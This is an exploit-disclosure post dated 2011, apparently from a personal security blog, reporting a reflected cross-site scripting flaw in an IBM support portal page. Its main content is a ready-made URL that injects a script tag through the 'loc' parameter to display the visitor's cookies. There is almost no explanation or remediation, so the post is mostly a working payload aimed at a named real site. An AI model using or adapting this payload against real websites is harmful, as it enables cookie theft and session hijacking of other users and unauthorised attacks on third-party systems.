# Exploit Title: ibm.com Cross Site Scripting Vulnerability
# Date: 12/11/2011 - 04:00am
# Author: Ryuzaki Lawlet
# Website: http://jusryuz.blogspot.com
# Tested On: WinXP
# Platform: -
# Email: ryuzaki_l@y7mail.com
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Vulnerable : http://www-01.domain.com/[path]/[pat]/portal.page?loc=en_US
[$] Preview Sites:
[~] http://www-01.ibm.com/support/electronicsupport/portal.page?loc=en_US%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28document.cookie%29%3C/SCRIPT%3E%22%3E
[XSS]
0 comments:
Post a Comment